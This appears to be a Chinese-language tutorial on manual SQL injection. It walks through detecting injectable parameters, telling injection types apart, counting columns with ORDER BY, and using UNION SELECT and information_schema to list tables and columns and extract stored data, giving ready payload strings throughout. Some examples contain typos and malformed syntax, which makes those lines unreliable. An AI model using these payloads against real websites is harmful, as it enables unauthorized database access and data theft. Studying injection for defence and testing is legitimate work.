這篇文章為大家帶來了關於sql中手工注入的相關問題,其中包括判斷注入點以及判斷注入類型的相關問題,希望對大家有幫助。
1.單引號法:直接在網址後面加上一個單引號,如果頁面無法正常顯示,瀏覽器回傳一些異常訊息,則表示該連結可能存在sql注入漏洞
2.1=1和1=2:在網址後面的get傳參加上and 1=1 ,顯示正常,把1=1替換為1 =2,顯示異常,表示網頁存在sql注入。
1.數字型注入:注入變數的值不需要用引號引起來,如
select * from user where id=$id;
2.字元型注入:注入變數會用引號包裹起來,如`
select * from user where username='$username';`
注入時注意要閉合引號。
3.搜尋型注入:
select * from user where username like '%$pass%';
把sql語句建構成
select * from user where username like '%$pass%' union select语句 '%%';
即傳輸的變數為 pass%’ union select語句 '% 形成閉合。
透過抓包等方式判斷注入點的提交方式是get,post,還是cookie。
使用order by 語句可以查詢出資料庫有多少個字段,可以透過不斷的嘗試來確定資料庫字段數量,如在輸入oeder by 9時,頁面報錯而輸入order by 8時頁面顯示正常,即資料庫中有8個欄位。
如查詢語句為:select * from user where id='$id';
可以建構下面的輸入:(id = ') ' order by 3 ' --
即查詢語句為:select * from user where id='' order by 3 '--'
使用union select 語句來查詢目前使用使用者user() ,資料庫database() ,資料庫版本version() ,伺服器作業系統的@@version_compile_os等資訊
version版本十分重要,如果版本在5.0以上,就可以使用information_schema函式庫輕易的查詢想要的資訊
建構語句:
select * from user where id='' union select user(),database(),version()+--+;
#5.0 版本以上的mysql資料庫自帶的information_schema函式庫中儲存著資料庫中所有的表名和列明資訊。
下面我們就應該根據第五步驟查詢的目前資料庫的結果(如資料庫為database_1)名下所有的表名tables的資訊。 Information_schema.tables
:記錄著資料庫中所有表名資訊的表。
建構的查詢語句如下:
Select * from user where id='' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database_1;--
查詢的結果為:第五步驟查詢的目前資料庫中的表名資訊。 Information_schema.columns:
記錄資料庫中所有的表中的列名資訊;
下面就應該根據上面查詢得到的表名資訊(如表為table_1)查詢他的列名信息,建構語句如下:
Select * from user where id='' union selcet 1,group_concat(column_name),3 from information_schema.columns where table_name=table_1;--
查詢出列名後,就可以直接透過聯合查詢查出表中儲存的資訊(如查出的列名為column_1,column_2)建構語句
Selcet * from user where id='' union select 1,column_1,column_2 from tables;--
即可查詢指定資料庫指定表格的儲存資料
推薦學習:mysql影片教學
以上是一起聊聊簡單的sql手工注入過程的詳細內容。更多資訊請關注PHP中文網其他相關文章!